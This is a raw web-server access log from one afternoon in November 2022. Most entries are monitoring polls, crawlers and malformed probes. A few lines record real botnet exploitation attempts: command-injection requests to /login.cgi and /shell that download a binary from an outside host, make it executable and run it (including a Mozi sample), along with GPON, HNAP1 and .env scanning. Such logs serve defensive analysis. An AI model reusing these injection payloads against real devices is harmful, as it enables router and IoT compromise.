212.91.246.72 - - [01/Nov/2022:14:17:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.47.61.99 - - [01/Nov/2022:14:17:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
193.47.61.99 - - [01/Nov/2022:14:17:58 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 323 "-" "Momentum"
36.108.170.121 - - [01/Nov/2022:14:18:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Nov/2022:14:18:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.71.137.100 - - [01/Nov/2022:14:19:29 +0100] "\x16\x03\x01" 501 318 "-" "-"
167.71.137.100 - - [01/Nov/2022:14:19:29 +0100] "\x16\x03\x01" 501 318 "-" "-"
167.71.137.100 - - [01/Nov/2022:14:19:29 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Nov/2022:14:19:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.132.53.101 - - [01/Nov/2022:14:19:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.132.53.101 - - [01/Nov/2022:14:19:51 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 323 "-" "Momentum"
193.47.61.99 - - [01/Nov/2022:14:20:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
193.47.61.99 - - [01/Nov/2022:14:20:18 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 323 "-" "Momentum"
212.91.246.72 - - [01/Nov/2022:14:20:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.35 - - [01/Nov/2022:14:21:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
183.136.225.35 - - [01/Nov/2022:14:21:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.35 - - [01/Nov/2022:14:21:26 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.35 - - [01/Nov/2022:14:21:26 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
103.237.174.82 - - [01/Nov/2022:14:21:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Nov/2022:14:21:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:22:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.139.227.139 - - [01/Nov/2022:14:22:52 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
34.139.227.139 - - [01/Nov/2022:14:22:52 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.47.61.99 - - [01/Nov/2022:14:23:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
193.47.61.99 - - [01/Nov/2022:14:23:26 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 323 "-" "Momentum"
212.91.246.72 - - [01/Nov/2022:14:23:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.122.204.30 - - [01/Nov/2022:14:24:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [01/Nov/2022:14:24:38 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [01/Nov/2022:14:24:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.122.204.30 - - [01/Nov/2022:14:25:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [01/Nov/2022:14:25:24 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
86.134.42.20 - - [01/Nov/2022:14:25:36 +0100] "GET /login.cgi?cli=aa%20aa%27;rm -rf /tmp/ff;wget%20http://51.38.17.48/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 404 310 "-" "DEMONS/2.0"
212.91.246.72 - - [01/Nov/2022:14:25:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.122.204.30 - - [01/Nov/2022:14:26:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [01/Nov/2022:14:26:29 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
45.227.254.54 - - [01/Nov/2022:14:26:32 +0100] "\x03" 501 316 "-" "-"
212.91.246.72 - - [01/Nov/2022:14:26:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:27:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.122.204.30 - - [01/Nov/2022:14:28:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [01/Nov/2022:14:28:14 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
185.122.204.30 - - [01/Nov/2022:14:28:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [01/Nov/2022:14:28:39 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [01/Nov/2022:14:28:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.60.149.55 - - [01/Nov/2022:14:29:23 +0100] "\x03" 501 316 "-" "-"
179.60.149.55 - - [01/Nov/2022:14:29:26 +0100] "\x03" 501 316 "-" "-"
212.91.246.72 - - [01/Nov/2022:14:29:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.132.53.101 - - [01/Nov/2022:14:30:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.132.53.101 - - [01/Nov/2022:14:30:30 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 323 "-" "Momentum"
185.122.204.30 - - [01/Nov/2022:14:30:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [01/Nov/2022:14:30:37 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [01/Nov/2022:14:30:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.122.204.30 - - [01/Nov/2022:14:31:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [01/Nov/2022:14:31:01 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [01/Nov/2022:14:31:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.122.204.30 - - [01/Nov/2022:14:32:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [01/Nov/2022:14:32:12 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [01/Nov/2022:14:32:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
159.203.29.133 - - [01/Nov/2022:14:32:46 +0100] "\xe7\x1b\xdcv,N\x89Uq\x84\xc6\x93\x1a\xe5\x96\x9f\x19\"\xcc\x029\x06\x8e\x02\x83\x8aO\xa95\x06\x8e\x028\x02\xcc\x029\x06\x8d" 501 359 "-" "-"
159.203.29.133 - - [01/Nov/2022:14:32:47 +0100] "\x16\x03\x01" 501 318 "-" "-"
159.203.29.133 - - [01/Nov/2022:14:32:47 +0100] "\x16\x03\x01" 501 318 "-" "-"
159.203.29.133 - - [01/Nov/2022:14:32:47 +0100] "\x16\x03\x01" 501 318 "-" "-"
87.246.7.177 - - [01/Nov/2022:14:32:47 +0100] "CONNECT www.google.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
92.118.39.78 - - [01/Nov/2022:14:33:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [01/Nov/2022:14:33:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [01/Nov/2022:14:33:12 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
185.122.204.30 - - [01/Nov/2022:14:33:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [01/Nov/2022:14:33:26 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [01/Nov/2022:14:33:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.180.143.137 - - [01/Nov/2022:14:34:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
61.147.66.216 - - [01/Nov/2022:14:34:20 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://61.147.66.216:35972/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 310 "-" "Hello, world"
212.91.246.72 - - [01/Nov/2022:14:34:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.227.254.54 - - [01/Nov/2022:14:34:47 +0100] "\x03" 501 316 "-" "-"
212.91.246.72 - - [01/Nov/2022:14:35:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:36:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:37:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:38:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
68.183.15.135 - - [01/Nov/2022:14:38:50 +0100] "\x16\x03\x01" 501 318 "-" "-"
68.183.15.135 - - [01/Nov/2022:14:38:50 +0100] "\x16\x03\x01" 501 318 "-" "-"
68.183.15.135 - - [01/Nov/2022:14:38:50 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Nov/2022:14:39:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.47.61.99 - - [01/Nov/2022:14:40:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
193.47.61.99 - - [01/Nov/2022:14:40:12 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 323 "-" "Momentum"
212.91.246.72 - - [01/Nov/2022:14:40:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:41:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:42:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.118.39.78 - - [01/Nov/2022:14:43:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Nov/2022:14:43:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:44:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.47.61.99 - - [01/Nov/2022:14:45:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
193.47.61.99 - - [01/Nov/2022:14:45:30 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 323 "-" "Momentum"
212.91.246.72 - - [01/Nov/2022:14:45:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:46:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:47:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.118.39.78 - - [01/Nov/2022:14:48:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Nov/2022:14:48:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:49:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:50:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:51:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:52:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:53:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:54:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
111.118.40.97 - - [01/Nov/2022:14:54:49 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
87.246.7.177 - - [01/Nov/2022:14:55:25 +0100] "CONNECT www.google.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Nov/2022:14:55:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.47.61.99 - - [01/Nov/2022:14:56:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Nov/2022:14:56:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.47.61.99 - - [01/Nov/2022:14:56:49 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 323 "-" "Momentum"
212.91.246.72 - - [01/Nov/2022:14:57:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:58:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:59:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:15:00:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.130 - - [01/Nov/2022:15:01:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
185.180.143.137 - - [01/Nov/2022:15:01:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Nov/2022:15:01:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:15:02:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:15:03:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.129 - - [01/Nov/2022:15:04:32 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0"
212.91.246.72 - - [01/Nov/2022:15:04:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.70.95.84 - - [01/Nov/2022:15:05:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Nov/2022:15:05:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.47.61.60 - - [01/Nov/2022:15:06:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Nov/2022:15:06:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.47.61.60 - - [01/Nov/2022:15:06:47 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 323 "-" "Momentum"
212.91.246.72 - - [01/Nov/2022:15:07:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
117.33.227.207 - - [01/Nov/2022:15:08:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.246.72 - - [01/Nov/2022:15:08:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:15:09:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:15:10:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:15:11:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:15:12:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.180.48.125 - - [01/Nov/2022:15:13:46 +0100] "GET /docker-compose.yml HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Linux; Android 9; RMX1851) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36"
212.91.246.72 - - [01/Nov/2022:15:13:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:15:14:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:15:15:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:15:16:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:15:17:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:15:18:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.119.78.79 - - [01/Nov/2022:15:19:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
92.118.39.78 - - [01/Nov/2022:15:19:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Nov/2022:15:19:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:15:20:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:15:21:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.167.10 - - [01/Nov/2022:15:22:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [01/Nov/2022:15:22:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:15:23:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:15:24:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:15:25:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.167.10 - - [01/Nov/2022:15:26:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [01/Nov/2022:15:26:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:15:27:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.246.165.150 - - [01/Nov/2022:15:28:20 +0100] "GET /frameset/left.htm HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:59.0) Gecko/20100101 Firefox/59.0"
64.246.165.150 - - [01/Nov/2022:15:28:21 +0100] "GET /frameset/top.htm HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:59.0) Gecko/20100101 Firefox/59.0"
64.246.165.150 - - [01/Nov/2022:15:28:21 +0100] "GET /neue_seite_1.htm HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:59.0) Gecko/20100101 Firefox/59.0"
157.245.123.122 - - [01/Nov/2022:15:28:43 +0100] "\x16\x03\x01" 501 318 "-" "-"
157.245.123.122 - - [01/Nov/2022:15:28:44 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Nov/2022:15:28:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.246.7.177 - - [01/Nov/2022:15:29:33 +0100] "CONNECT www.google.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Nov/2022:15:29:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:15:30:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.227.254.54 - - [01/Nov/2022:15:31:03 +0100] "\x03" 501 316 "-" "-"
212.91.246.72 - - [01/Nov/2022:15:31:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:15:32:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.167.10 - - [01/Nov/2022:15:32:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [01/Nov/2022:15:33:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:15:34:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.167.10 - - [01/Nov/2022:15:34:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [01/Nov/2022:15:35:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
72.214.101.148 - - [01/Nov/2022:15:36:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
179.43.167.10 - - [01/Nov/2022:15:36:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [01/Nov/2022:15:36:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:15:37:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:15:38:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.167.10 - - [01/Nov/2022:15:39:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [01/Nov/2022:15:39:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:15:40:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
